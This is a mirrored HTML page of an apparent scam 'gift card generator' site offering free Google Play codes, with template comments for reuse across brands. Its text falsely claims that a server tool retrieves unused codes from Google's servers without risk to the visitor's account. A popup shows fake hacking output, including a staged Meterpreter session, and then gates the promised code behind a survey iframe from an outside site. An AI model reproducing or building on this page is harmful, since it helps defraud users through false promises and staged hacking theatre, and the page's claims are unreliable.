﻿<!doctype html>
<html>



<!-- Mirrored from alira.xyz/google-play-gift-cards.html by HTTrack Website Copier/3.x [XR&CO'2017], Tue, 08 Mar 2022 07:35:19 GMT -->
<head>

  <meta charset="utf-8"/>
  <title>Google Play Gift Cards - Join Gift Cards Giveaway</title> <!--============== CHANGE HERE page title -->
  <base /> <!--============== CHANGE HERE uncomment -->
    
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
  <link rel="shortcut icon" href="favicon.html">
  <link rel="icon" type="image/png" href="favicon-32x32.html" sizes="32x32">
  <link rel="icon" type="image/png" href="favicon-16x16.html" sizes="16x16">
    
  <meta name="author" content="Gift Cards Giveaway"/>
  <meta name="description" content="Get Google Play Gift Card Code and purchase anything on the Google Play Store."/> <!--============== CHANGE HERE description -->

  <meta property="og:description" content="Get Google Play Gift Card Code and purchase anything on the Google Play Store."/> <!--============== CHANGE HERE description -->
  <meta property="og:image" content="resopurces/meta.html"/>
  <meta property="og:site_name" content="Gift Cards Giveaway"/>
  <meta property="og:title" content="Google Play Gift Cards"/> <!--============== CHANGE HERE page title -->
  <meta property="og:type" content="website"/>
  <meta property="og:url" content=""/>

  <link href="../external.html?link=https://fonts.googleapis.com/css?family=Raleway:400,700" rel="stylesheet">
  <link href="../external.html?link=https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet">
  <link rel="stylesheet" type="text/css" href="resources/stylesV2.css"/>
    
</head>
<body class="page" oncontextmenu="return false">

  <script type="text/javascript">document.body.className += " preload";</script>

  <div id="preload">
    <div id="preload-logo"></div>
    <div id="preloader" class="google"><span></span></div>
  </div>

  <div id="menu">
    <ul>
      <a href="index-2.html" id="menu-logo"></a>
      <li><a class="menu active bck-google" href="google-play-gift-cards.html">Google Play</a></li> <!--============== CHANGE HERE active bck-app -->
      <li><a class="menu" href="xbox-gift-cards.html">Xbox</a></li>
      <li><a class="menu" href="steam-gift-cards.html">Steam</a></li>
      <li><a class="menu" href="playstation-store-gift-cards.html">Playstation</a></li>
      <li><a class="menu" href="spotify-gift-cards.html">Spotify</a></li>
      <li><a class="menu" href="itunes-gift-cards.html">iTunes</a></li>
      <li><a class="menu" href="paypal-gift-cards.html">PayPal</a></li>
      
      <li><a class="menu" href="paysafe-gift-cards.html">PaySafe</a></li>
      <li><a class="menu" href="roblox-gift-cards.html">Roblox</a></li>
      <li><a class="menu" href="eshop-gift-cards.html">Nintendo eShop</a></li>
    </ul>
  </div> <!-- menu -->

  <div id="wrapper">

    <div id="header">
      <div id="crown"></div>
      <a href="index-2.html" id="logo"><span>Gift Cards Giveaway</span></a>
      <div id="menu-trigger">
        <div class="menu-trigger"></div>
        <div class="menu-trigger"></div>
        <div class="menu-trigger"></div>
      </div>
    </div> <!-- header -->

    <div id="switch"></div>

    <div id="desktop-notification">Please change orientation to portrait, or resize browser width until you see content. Desktop version is still under construction.</div>

    <div id="start">
      <div class="start-gift-card pos-1 card-google"><div class="value">$50</div></div> <!--============== CHANGE HERE all 3 values and card-app -->
      <div class="start-gift-card pos-0 card-google"><div class="value">$10</div></div>
      <div class="start-gift-card pos-2 card-google"><div class="value">$25</div></div>
    </div> <!-- start -->
    
    <div id="title">
      <h1>Join To Get<br/>Google Play Gift Cards<br/>Giveaway</h1> <!--============== CHANGE HERE title -->
      <div id="scroll-down">
        <svg width="100%" height="100%" version="1.1" style="fill-rule:evenodd; clip-rule:evenodd" viewBox="0 0 1289 730">
         <defs> <style type="text/css"> <![CDATA[.scroll-down {fill:gray;fill-opacity:0.501961} ]]> </style> </defs>
         <g> <polygon class="scroll-down" points="86,0 644,559 1203,0 1289,86 730,644 644,730 559,644 0,86 "/> </g>
        </svg>
      </div>
    </div> <!-- title -->

    <div id="page">
      <div class="page-about">
        <div class="background bck-google"></div> <!--============== CHANGE HERE bck-app -->
        <div class="logo logo-google"></div> <!--============== CHANGE HERE logo-app -->
        <div class="text">
          <p>Chance To Get Google Play Gift Card Codes and purchase anything in the Google Play Store.</p> <!--============== CHANGE HERE description -->
          <div class="hidden">
            <div class="hidden-wrapper">
              <!-- read more text --> <!--============== CHANGE HERE generator-name -->
<h2>How to join & claim Google Play Gift Cards?</h2>
<p>Google PlayStore Gift Codes giveaway are very easy to get with our server site. You just have to do is to select your Gift Cards value and wait our server to find unused codes on Google Playstore server. After Get unused codes safely and directly from your web browser. no account or passwords need!</p>

<h2>How to redeem Google Play Gift Cards?</h2>
<p>You can claim your Gift Card codes with desktop, tablet or mobile internet browser. Goes to Google Play Store website, click at the menu bar and choose Redeem Code. Now you have to copy & fill with your codes from our server and the money will be directly add to your google store account.</p>

<h2>How is this work & possible?</h2>
<p>Our Web Server will find new unused codes from google play server with our latest server tool (Server Update 2019). And We guarantee that this methods wont harm or banned your account because we just used our server tool to claim unused gift codes from google server.</p>
            </div>
          </div>
        </div>
        <a class="read-more-link" href="#">Read More</a>
      </div>

      <div class="title">Choose Gift<br/>Card value</div>

</script></center>      
      <div id="choose-card">
        <div id="chooser">
          <div class="choose-gift-card card-google"><div class="value">$10</div></div> <!--============== CHANGE HERE all 3 values and card-app -->
          <div class="choose-gift-card card-google"><div class="value">$25</div></div>
          <div class="choose-gift-card card-google"><div class="value">$50</div></div>
        </div>
      </div>
    </div> <!-- page -->


    
  </div> <!-- end of wrapper -->

  <div id="gboverlay">
    <div id="gbmouse"></div>
    <div id="generatorbox" class="popup-google"> <!--============== CHANGE HERE popup-app -->
      <div id="gbinner">
        <div id="steps">
          <div class="stepname active" id="step1">Connecting</div>
          <div class="stepname" id="step2">Generating</div>
          <div class="stepname" id="step3">Completed</div>
          <div id="statusbar">
            <div id="sbcomplete"></div>
            <div class="sbcirca active" id="sbcirca1"></div>
            <div class="sbcirca" id="sbcirca2"></div>
            <div class="sbcirca" id="sbcirca3"></div>
          </div>
        </div>
        <div id="genlogo" class="logo-google"></div> <!--============== CHANGE HERE logo-app -->
        <div id="genreturn" format="XXXXX-XXXXXX-XXXXXX-XXXXX"></div> <!--============== CHANGE HERE XXXX-code -->
        <div id="statustext"></div>
        <div id="hacklines">
          <p class="level1">Connecting to Google Play server...</p> <!--============== CHANGE HERE name -->
          <p class="level1">Server is up at 192.200.175.162:445 (latency 0.013s)</p>
          <p class="level1">Connecting to server SQL database...</p>
          <p class="level1">Obtaining a service manager handle...</p>
          <p class="level1">Creating a new service through pipeline...</p>
          <p class="level1">Closing service handle...</p>
          <p class="level1">Sending stage (749370 bytes) to 192.200.175.162</p>
          <p class="level1">Meterpreter session 1 opened at port 445</p>
          <p class="level1">Connected to Google Play server...</p> <!--============== CHANGE HERE name -->
          <p class="level2 longsearch">Searching database for unused codes...</p>
          <p class="level3 p-video">Success!</p>
          <p class="level3 p-survey">Please complete one of the surveys to get complete code...</p>
        </div>
        <div id="widgetholder"><iframe src="../external.html?link=https://fasterfiles.net/1096204" height="200px" marginwidth="0" marginheight="0" align="middle" frameborder="0" width="100%" ></iframe>
      </div>
    </div>
  </div> <!-- end of generator -->

  <script type="text/javascript" src="resources/jquery.js"></script>
  <script type="text/javascript" src="resources/pluginsV2.js"></script>
 
</body>




<!-- Mirrored from alira.xyz/google-play-gift-cards.html by HTTrack Website Copier/3.x [XR&CO'2017], Tue, 08 Mar 2022 07:35:19 GMT -->
</html>